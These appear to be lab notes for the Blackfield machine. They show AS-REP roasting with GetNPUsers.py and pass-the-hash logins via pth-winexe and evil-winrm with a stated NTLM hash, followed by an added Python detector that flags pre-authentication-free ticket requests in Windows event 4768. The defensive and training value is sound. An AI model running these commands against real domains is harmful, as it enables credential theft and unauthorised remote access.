searchsploit -m 48431
When you have a list of possible users, use GetNPUsers.py to get the correct user list with the NTLM hash. After that, use the commands "pth-winexe" or "evil-winrm" with the NTLM hash to log in to the Windows system.
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
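# Method 1: pth-winexe takes the hash as LM:NT after the user name
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd
# Method 2: evil-winrm takes the user with -u (-U is the WinRM URL) and only the NT half of the hash with -H
evil-winrm -u svc_backup -H b624dc83a27cc29da11d9bf25efea796 -i 10.10.10.192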
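The GetNPUsers.py step above asks the domain controller for TGTs for accounts that do not require Kerberos pre-authentication, which is visible on the DC in Security event 4768. The following is an added example, not part of the original notes, of how a defender could flag that pattern; the field names follow event 4768, while the sample events, account names, addresses and the `enum_threshold` value are constructed assumptions.

```python
from collections import defaultdict

def _ev(user, ip, status, preauth, etype):
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

# Constructed sample of event 4768 (TGT requested) fields; not from a real log.
SAMPLE_EVENTS = [
    _ev("alice", "::ffff:192.0.2.10", "0x0", "2", "0x12"),          # normal logon
    _ev("nosuch1", "::ffff:192.0.2.50", "0x6", "-", "0xffffffff"),  # unknown user
    _ev("nosuch2", "::ffff:192.0.2.50", "0x6", "-", "0xffffffff"),
    _ev("nosuch3", "::ffff:192.0.2.50", "0x6", "-", "0xffffffff"),
    _ev("svc_legacy", "::ffff:192.0.2.50", "0x0", "0", "0x17"),     # no pre-auth, RC4
    _ev("kiosk", "::ffff:192.0.2.20", "0x0", "0", "0x12"),          # no pre-auth, AES
]

def find_no_preauth_requests(events, enum_threshold=3):
    """Group 4768 events by source and report TGTs issued without pre-auth.

    A source is 'high' when it also probed >= enum_threshold unknown names
    (Status 0x6), the pattern a user-list sweep leaves behind.
    """
    issued = defaultdict(set)    # ip -> accounts that got a TGT with PreAuthType 0
    unknown = defaultdict(set)   # ip -> names the KDC rejected as unknown
    rc4 = defaultdict(bool)      # ip -> any such TGT used RC4 (0x17)
    for ev in events:
        ip = ev["IpAddress"].replace("::ffff:", "")
        status = ev["Status"].lower()
        if status == "0x6":
            unknown[ip].add(ev["TargetUserName"].lower())
        elif status == "0x0" and ev["PreAuthType"] == "0":
            issued[ip].add(ev["TargetUserName"].lower())
            rc4[ip] = rc4[ip] or ev["TicketEncryptionType"].lower() == "0x17"
    findings = {}
    for ip, accounts in issued.items():
        swept = len(unknown[ip]) >= enum_threshold
        findings[ip] = {"accounts": sorted(accounts),
                        "unknown_names": len(unknown[ip]),
                        "rc4": rc4[ip],
                        "severity": "high" if swept else "review"}
    return findings

if __name__ == "__main__":
    for ip, finding in find_no_preauth_requests(SAMPLE_EVENTS).items():
        print(ip, finding)
```

Every account listed in a finding has "Do not require Kerberos preauthentication" set; clearing that flag and rotating the account's password closes the exposure.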